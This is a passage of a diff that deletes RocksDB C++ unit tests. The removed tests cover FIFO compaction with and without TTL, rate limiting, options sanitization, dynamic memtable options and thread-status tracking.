-      ASSERT_EQ("NOT_FOUND", Get(ToString(i)));
-    }
-  }
-}
-
-TEST_F(DBTest, FIFOCompactionTestWithCompaction) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 20 << 10;  // 20K
-  options.arena_block_size = 4096;
-  options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1MB
-  options.compaction_options_fifo.allow_compaction = true;
-  options.level0_file_num_compaction_trigger = 6;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 60; i++) {
-    // Generate and flush a file about 20KB.
-    for (int j = 0; j < 20; j++) {
-      ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-    }
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  // It should be compacted to 10 files.
-  ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-  for (int i = 0; i < 60; i++) {
-    // Generate and flush a file about 20KB.
-    for (int j = 0; j < 20; j++) {
-      ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980)));
-    }
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-
-  // It should be compacted to no more than 20 files.
-  ASSERT_GT(NumTableFilesAtLevel(0), 10);
-  ASSERT_LT(NumTableFilesAtLevel(0), 18);
-  // Size limit is still guaranteed.
-  ASSERT_LE(SizeAtLevel(0),
-            options.compaction_options_fifo.max_table_files_size);
-}
-
-TEST_F(DBTest, FIFOCompactionStyleWithCompactionAndDelete) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 20 << 10;  // 20K
-  options.arena_block_size = 4096;
-  options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1MB
-  options.compaction_options_fifo.allow_compaction = true;
-  options.level0_file_num_compaction_trigger = 3;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 3; i++) {
-    // Each file contains a different key which will be dropped later.
-    ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500)));
-    ASSERT_OK(Put("key" + ToString(i), ""));
-    ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500)));
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  for (int i = 0; i < 3; i++) {
-    ASSERT_EQ("", Get("key" + ToString(i)));
-  }
-  for (int i = 0; i < 3; i++) {
-    // Each file contains a different key which will be dropped later.
-    ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500)));
-    ASSERT_OK(Delete("key" + ToString(i)));
-    ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500)));
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  for (int i = 0; i < 3; i++) {
-    ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i)));
-  }
-}
-
-// Check that FIFO-with-TTL is not supported with max_open_files != -1.
-TEST_F(DBTest, FIFOCompactionWithTTLAndMaxOpenFilesTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.create_if_missing = true;
-  options.compaction_options_fifo.ttl = 600;  // seconds
-
-  // Check that it is not supported with max_open_files != -1.
-  options.max_open_files = 100;
-  options = CurrentOptions(options);
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  options.max_open_files = -1;
-  ASSERT_OK(TryReopen(options));
-}
-
-// Check that FIFO-with-TTL is supported only with BlockBasedTableFactory.
-TEST_F(DBTest, FIFOCompactionWithTTLAndVariousTableFormatsTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.create_if_missing = true;
-  options.compaction_options_fifo.ttl = 600;  // seconds
-
-  options = CurrentOptions(options);
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  ASSERT_OK(TryReopen(options));
-
-  Destroy(options);
-  options.table_factory.reset(NewPlainTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  Destroy(options);
-  options.table_factory.reset(NewCuckooTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-
-  Destroy(options);
-  options.table_factory.reset(NewAdaptiveTableFactory());
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-}
-
-TEST_F(DBTest, FIFOCompactionWithTTLTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 10 << 10;  // 10KB
-  options.arena_block_size = 4096;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  env_->time_elapse_only_sleep_ = false;
-  options.env = env_;
-
-  // Test to make sure that all files with expired ttl are deleted on next
-  // manual compaction.
-  {
-    env_->addon_time_.store(0);
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60 ;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    // Note: Couldn't use SleepForMicroseconds because it takes an int instead
-    // of uint64_t. Hence used addon_time_ directly.
-    // env_->SleepForMicroseconds(2 * 60 * 60 * 1000 * 1000);
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-
-    // Since no flushes and compactions have run, the db should still be in
-    // the same state even after considerable time has passed.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  }
-
-  // Test to make sure that all files with expired ttl are deleted on next
-  // automatic compaction.
-  {
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    // Create 1 more file to trigger TTL compaction. The old files are dropped.
-    for (int i = 0; i < 1; i++) {
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-    }
-
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    // Only the new 10 files remain.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test that shows the fall back to size-based FIFO compaction if TTL-based
-  // deletion doesn't move the total size to be less than max_table_files_size.
-  {
-    options.write_buffer_size = 10 << 10;                              // 10KB
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = false;
-    options.compaction_options_fifo.ttl =  1 * 60 * 60;  // 1 hour
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 3; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 3);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 3);
-
-    for (int i = 0; i < 5; i++) {
-      for (int j = 0; j < 140; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // Size limit is still guaranteed.
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test with TTL + Intra-L0 compactions.
-  {
-    options.compaction_options_fifo.max_table_files_size = 150 << 10;  // 150KB
-    options.compaction_options_fifo.allow_compaction = true;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options.level0_file_num_compaction_trigger = 6;
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 10; i++) {
-      // Generate and flush a file about 10KB.
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // With Intra-L0 compaction, out of 10 files, 6 files will be compacted to 1
-    // (due to level0_file_num_compaction_trigger = 6).
-    // So total files = 1 + remaining 4 = 5.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-
-    // Sleep for 2 hours -- which is much greater than TTL.
-    env_->addon_time_.fetch_add(2 * 60 * 60);
-    // Just to make sure that we are in the same state even after sleeping.
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-
-    // Create 10 more files. The old 5 files are dropped as their ttl expired.
-    for (int i = 0; i < 10; i++) {
-      for (int j = 0; j < 10; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-
-  // Test with large TTL + Intra-L0 compactions.
-  // Files dropped based on size, as ttl doesn't kick in.
-  {
-    options.write_buffer_size = 20 << 10;                               // 20K
-    options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1.5MB
-    options.compaction_options_fifo.allow_compaction = true;
-    options.compaction_options_fifo.ttl = 1 * 60 * 60;  // 1 hour
-    options.level0_file_num_compaction_trigger = 6;
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 60; i++) {
-      // Generate and flush a file about 20KB.
-      for (int j = 0; j < 20; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-    // It should be compacted to 10 files.
-    ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-    for (int i = 0; i < 60; i++) {
-      // Generate and flush a file about 20KB.
-      for (int j = 0; j < 20; j++) {
-        ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980)));
-      }
-      Flush();
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    }
-
-    // It should be compacted to no more than 20 files.
-    ASSERT_GT(NumTableFilesAtLevel(0), 10);
-    ASSERT_LT(NumTableFilesAtLevel(0), 18);
-    // Size limit is still guaranteed.
-    ASSERT_LE(SizeAtLevel(0),
-              options.compaction_options_fifo.max_table_files_size);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-/*
- * This test is not reliable enough as it heavily depends on disk behavior.
- * Disable as it is flaky.
- */
-TEST_F(DBTest, DISABLED_RateLimitingTest) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 1 << 20;  // 1MB
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 1 << 20;     // 1MB
-  options.max_bytes_for_level_base = 4 << 20;  // 4MB
-  options.max_bytes_for_level_multiplier = 4;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options.env = env_;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.IncreaseParallelism(4);
-  DestroyAndReopen(options);
-
-  WriteOptions wo;
-  wo.disableWAL = true;
-
-  // # no rate limiting
-  Random rnd(301);
-  uint64_t start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  uint64_t elapsed = env_->NowMicros() - start;
-  double raw_rate = env_->bytes_written_ * 1000000.0 / elapsed;
-  uint64_t rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS);
-  ASSERT_EQ(0, rate_limiter_drains);
-  Close();
-
-  // # rate limiting with 0.7 x threshold
-  options.rate_limiter.reset(
-      NewGenericRateLimiter(static_cast<int64_t>(0.7 * raw_rate)));
-  env_->bytes_written_ = 0;
-  DestroyAndReopen(options);
-
-  start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS) -
-      rate_limiter_drains;
-  elapsed = env_->NowMicros() - start;
-  Close();
-  ASSERT_EQ(options.rate_limiter->GetTotalBytesThrough(), env_->bytes_written_);
-  // Most intervals should've been drained (interval time is 100ms, elapsed is
-  // micros)
-  ASSERT_GT(rate_limiter_drains, 0);
-  ASSERT_LE(rate_limiter_drains, elapsed / 100000 + 1);
-  double ratio = env_->bytes_written_ * 1000000 / elapsed / raw_rate;
-  fprintf(stderr, "write rate ratio = %.2lf, expected 0.7\n", ratio);
-  ASSERT_TRUE(ratio < 0.8);
-
-  // # rate limiting with half of the raw_rate
-  options.rate_limiter.reset(
-      NewGenericRateLimiter(static_cast<int64_t>(raw_rate / 2)));
-  env_->bytes_written_ = 0;
-  DestroyAndReopen(options);
-
-  start = env_->NowMicros();
-  // Write ~96M data
-  for (int64_t i = 0; i < (96 << 10); ++i) {
-    ASSERT_OK(
-        Put(RandomString(&rnd, 32), RandomString(&rnd, (1 << 10) + 1), wo));
-  }
-  elapsed = env_->NowMicros() - start;
-  rate_limiter_drains =
-      TestGetTickerCount(options, NUMBER_RATE_LIMITER_DRAINS) -
-      rate_limiter_drains;
-  Close();
-  ASSERT_EQ(options.rate_limiter->GetTotalBytesThrough(), env_->bytes_written_);
-  // Most intervals should've been drained (interval time is 100ms, elapsed is
-  // micros)
-  ASSERT_GT(rate_limiter_drains, elapsed / 100000 / 2);
-  ASSERT_LE(rate_limiter_drains, elapsed / 100000 + 1);
-  ratio = env_->bytes_written_ * 1000000 / elapsed / raw_rate;
-  fprintf(stderr, "write rate ratio = %.2lf, expected 0.5\n", ratio);
-  ASSERT_LT(ratio, 0.6);
-}
-
-TEST_F(DBTest, TableOptionsSanitizeTest) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_EQ(db_->GetOptions().allow_mmap_reads, false);
-
-  options.table_factory.reset(new PlainTableFactory());
-  options.prefix_extractor.reset(NewNoopTransform());
-  Destroy(options);
-  ASSERT_TRUE(!TryReopen(options).IsNotSupported());
-
-  // Test for check of prefix_extractor when hash index is used for
-  // block-based table
-  BlockBasedTableOptions to;
-  to.index_type = BlockBasedTableOptions::kHashSearch;
-  options = CurrentOptions();
-  options.create_if_missing = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(to));
-  ASSERT_TRUE(TryReopen(options).IsInvalidArgument());
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  ASSERT_OK(TryReopen(options));
-}
-
-TEST_F(DBTest, ConcurrentMemtableNotSupported) {
-  Options options = CurrentOptions();
-  options.allow_concurrent_memtable_write = true;
-  options.soft_pending_compaction_bytes_limit = 0;
-  options.hard_pending_compaction_bytes_limit = 100;
-  options.create_if_missing = true;
-
-  DestroyDB(dbname_, options);
-  options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true, 4));
-  ASSERT_NOK(TryReopen(options));
-
-  options.memtable_factory.reset(new SkipListFactory);
-  ASSERT_OK(TryReopen(options));
-
-  ColumnFamilyOptions cf_options(options);
-  cf_options.memtable_factory.reset(
-      NewHashLinkListRepFactory(4, 0, 3, true, 4));
-  ColumnFamilyHandle* handle;
-  ASSERT_NOK(db_->CreateColumnFamily(cf_options, "name", &handle));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, SanitizeNumThreads) {
-  for (int attempt = 0; attempt < 2; attempt++) {
-    const size_t kTotalTasks = 8;
-    test::SleepingBackgroundTask sleeping_tasks[kTotalTasks];
-
-    Options options = CurrentOptions();
-    if (attempt == 0) {
-      options.max_background_compactions = 3;
-      options.max_background_flushes = 2;
-    }
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-
-    for (size_t i = 0; i < kTotalTasks; i++) {
-      // Insert 5 tasks to low priority queue and 5 tasks to high priority queue
-      env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                     &sleeping_tasks[i],
-                     (i < 4) ? Env::Priority::LOW : Env::Priority::HIGH);
-    }
-
-    // Wait 100 milliseconds for they are scheduled.
-    env_->SleepForMicroseconds(100000);
-
-    // pool size 3, total task 4. Queue size should be 1.
-    ASSERT_EQ(1U, options.env->GetThreadPoolQueueLen(Env::Priority::LOW));
-    // pool size 2, total task 4. Queue size should be 2.
-    ASSERT_EQ(2U, options.env->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-    for (size_t i = 0; i < kTotalTasks; i++) {
-      sleeping_tasks[i].WakeUp();
-      sleeping_tasks[i].WaitUntilDone();
-    }
-
-    ASSERT_OK(Put("abc", "def"));
-    ASSERT_EQ("def", Get("abc"));
-    Flush();
-    ASSERT_EQ("def", Get("abc"));
-  }
-}
-
-TEST_F(DBTest, WriteSingleThreadEntry) {
-  std::vector<port::Thread> threads;
-  dbfull()->TEST_LockMutex();
-  auto w = dbfull()->TEST_BeginWrite();
-  threads.emplace_back([&] { Put("a", "b"); });
-  env_->SleepForMicroseconds(10000);
-  threads.emplace_back([&] { Flush(); });
-  env_->SleepForMicroseconds(10000);
-  dbfull()->TEST_UnlockMutex();
-  dbfull()->TEST_LockMutex();
-  dbfull()->TEST_EndWrite(w);
-  dbfull()->TEST_UnlockMutex();
-
-  for (auto& t : threads) {
-    t.join();
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DynamicMemtableOptions) {
-  const uint64_t k64KB = 1 << 16;
-  const uint64_t k128KB = 1 << 17;
-  const uint64_t k5KB = 5 * 1024;
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.compression = kNoCompression;
-  options.max_background_compactions = 1;
-  options.write_buffer_size = k64KB;
-  options.arena_block_size = 16 * 1024;
-  options.max_write_buffer_number = 2;
-  // Don't trigger compact/slowdown/stop
-  options.level0_file_num_compaction_trigger = 1024;
-  options.level0_slowdown_writes_trigger = 1024;
-  options.level0_stop_writes_trigger = 1024;
-  DestroyAndReopen(options);
-
-  auto gen_l0_kb = [this](int size) {
-    const int kNumPutsBeforeWaitForFlush = 64;
-    Random rnd(301);
-    for (int i = 0; i < size; i++) {
-      ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-
-      // The following condition prevents a race condition between flush jobs
-      // acquiring work and this thread filling up multiple memtables. Without
-      // this, the flush might produce less files than expected because
-      // multiple memtables are flushed into a single L0 file. This race
-      // condition affects assertion (A).
-      if (i % kNumPutsBeforeWaitForFlush == kNumPutsBeforeWaitForFlush - 1) {
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-  };
-
-  // Test write_buffer_size
-  gen_l0_kb(64);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  ASSERT_LT(SizeAtLevel(0), k64KB + k5KB);
-  ASSERT_GT(SizeAtLevel(0), k64KB - k5KB * 2);
-
-  // Clean up L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  // Increase buffer size
-  ASSERT_OK(dbfull()->SetOptions({
-      {"write_buffer_size", "131072"},
-  }));
-
-  // The existing memtable inflated 64KB->128KB when we invoked SetOptions().
-  // Write 192KB, we should have a 128KB L0 file and a memtable with 64KB data.
-  gen_l0_kb(192);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);  // (A)
-  ASSERT_LT(SizeAtLevel(0), k128KB + 2 * k5KB);
-  ASSERT_GT(SizeAtLevel(0), k128KB - 4 * k5KB);
-
-  // Decrease buffer size below current usage
-  ASSERT_OK(dbfull()->SetOptions({
-      {"write_buffer_size", "65536"},
-  }));
-  // The existing memtable became eligible for flush when we reduced its
-  // capacity to 64KB. Two keys need to be added to trigger flush: first causes
-  // memtable to be marked full, second schedules the flush. Then we should have
-  // a 128KB L0 file, a 64KB L0 file, and a memtable with just one key.
-  gen_l0_kb(2);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  ASSERT_LT(SizeAtLevel(0), k128KB + k64KB + 2 * k5KB);
-  ASSERT_GT(SizeAtLevel(0), k128KB + k64KB - 4 * k5KB);
-
-  // Test max_write_buffer_number
-  // Block compaction thread, which will also block the flushes because
-  // max_background_flushes == 0, so flushes are getting executed by the
-  // compaction thread
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  // Start from scratch and disable compaction/flush. Flush can only happen
-  // during compaction but trigger is pretty high
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  env_->SetBackgroundThreads(0, Env::HIGH);
-
-  // Put until writes are stopped, bounded by 256 puts. We should see stop at
-  // ~128KB
-  int count = 0;
-  Random rnd(301);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::DelayWrite:Wait",
-      [&](void* arg) { sleeping_task_low.WakeUp(); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  while (!sleeping_task_low.WokenUp() && count < 256) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-  ASSERT_GT(static_cast<double>(count), 128 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 128 * 1.2);
-
-  sleeping_task_low.WaitUntilDone();
-
-  // Increase
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_write_buffer_number", "8"},
-  }));
-  // Clean up memtable and L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  count = 0;
-  while (!sleeping_task_low.WokenUp() && count < 1024) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-// Windows fails this test. Will tune in the future and figure out
-// approp number
-#ifndef OS_WIN
-  ASSERT_GT(static_cast<double>(count), 512 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 512 * 1.2);
-#endif
-  sleeping_task_low.WaitUntilDone();
-
-  // Decrease
-  ASSERT_OK(dbfull()->SetOptions({
-      {"max_write_buffer_number", "4"},
-  }));
-  // Clean up memtable and L0
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  count = 0;
-  while (!sleeping_task_low.WokenUp() && count < 1024) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), WriteOptions()));
-    count++;
-  }
-// Windows fails this test. Will tune in the future and figure out
-// approp number
-#ifndef OS_WIN
-  ASSERT_GT(static_cast<double>(count), 256 * 0.8);
-  ASSERT_LT(static_cast<double>(count), 266 * 1.2);
-#endif
-  sleeping_task_low.WaitUntilDone();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif  // ROCKSDB_LITE
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-namespace {
-void VerifyOperationCount(Env* env, ThreadStatus::OperationType op_type,
-                          int expected_count) {
-  int op_count = 0;
-  std::vector<ThreadStatus> thread_list;
-  ASSERT_OK(env->GetThreadList(&thread_list));
-  for (auto thread : thread_list) {
-    if (thread.operation_type == op_type) {
-      op_count++;
-    }
-  }
-  ASSERT_EQ(op_count, expected_count);
-}
-}  // namespace
-
-TEST_F(DBTest, GetThreadStatus) {
-  Options options;
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  TryReopen(options);
-
-  std::vector<ThreadStatus> thread_list;
-  Status s = env_->GetThreadList(&thread_list);
-
-  for (int i = 0; i < 2; ++i) {
-    // repeat the test with differet number of high / low priority threads
-    const int kTestCount = 3;
-    const unsigned int kHighPriCounts[kTestCount] = {3, 2, 5};
-    const unsigned int kLowPriCounts[kTestCount] = {10, 15, 3};
-    for (int test = 0; test < kTestCount; ++test) {
-      // Change the number of threads in high / low priority pool.
-      env_->SetBackgroundThreads(kHighPriCounts[test], Env::HIGH);
-      env_->SetBackgroundThreads(kLowPriCounts[test], Env::LOW);
-      // Wait to ensure the all threads has been registered
-      unsigned int thread_type_counts[ThreadStatus::NUM_THREAD_TYPES];
-      // Try up to 60 seconds.
-      for (int num_try = 0; num_try < 60000; num_try++) {
-        env_->SleepForMicroseconds(1000);
-        thread_list.clear();
-        s = env_->GetThreadList(&thread_list);
-        ASSERT_OK(s);
-        memset(thread_type_counts, 0, sizeof(thread_type_counts));
-        for (auto thread : thread_list) {
-          ASSERT_LT(thread.thread_type, ThreadStatus::NUM_THREAD_TYPES);
-          thread_type_counts[thread.thread_type]++;
-        }
-        if (thread_type_counts[ThreadStatus::HIGH_PRIORITY] ==
-                kHighPriCounts[test] &&
-            thread_type_counts[ThreadStatus::LOW_PRIORITY] ==
-                kLowPriCounts[test]) {
-          break;
-        }
-      }
-      // Verify the total number of threades
-      ASSERT_EQ(thread_type_counts[ThreadStatus::HIGH_PRIORITY] +
-                    thread_type_counts[ThreadStatus::LOW_PRIORITY],
-                kHighPriCounts[test] + kLowPriCounts[test]);
-      // Verify the number of high-priority threads
-      ASSERT_EQ(thread_type_counts[ThreadStatus::HIGH_PRIORITY],
-                kHighPriCounts[test]);
-      // Verify the number of low-priority threads
-      ASSERT_EQ(thread_type_counts[ThreadStatus::LOW_PRIORITY],
-                kLowPriCounts[test]);
-    }
-    if (i == 0) {
-      // repeat the test with multiple column families
-      CreateAndReopenWithCF({"pikachu", "about-to-remove"}, options);
-      env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                     true);
-    }
-  }
-  db_->DropColumnFamily(handles_[2]);
-  delete handles_[2];
-  handles_.erase(handles_.begin() + 2);
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 true);
-  Close();
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 true);
-}
-
-TEST_F(DBTest, DisableThreadStatus) {
-  Options options;
-  options.env = env_;
-  options.enable_thread_tracking = false;
-  TryReopen(options);
-  CreateAndReopenWithCF({"pikachu", "about-to-remove"}, options);
-  // Verify non of the column family info exists
-  env_->GetThreadStatusUpdater()->TEST_VerifyColumnFamilyInfoMap(handles_,
-                                                                 false);
-}
-
-TEST_F(DBTest, ThreadStatusFlush) {
-  Options options;
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.enable_thread_tracking = true;
-  options = CurrentOptions(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"FlushJob::FlushJob()", "DBTest::ThreadStatusFlush:1"},
-      {"DBTest::ThreadStatusFlush:2", "FlushJob::WriteLevel0Table"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 0);
-
-  ASSERT_OK(Put(1, "foo", "v1"));
-  ASSERT_EQ("v1", Get(1, "foo"));
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 0);
-
-  uint64_t num_running_flushes = 0;
-  db_->GetIntProperty(DB::Properties::kNumRunningFlushes, &num_running_flushes);
-  ASSERT_EQ(num_running_flushes, 0);
-
-  Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-  Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-
-  // The first sync point is to make sure there's one flush job
-  // running when we perform VerifyOperationCount().
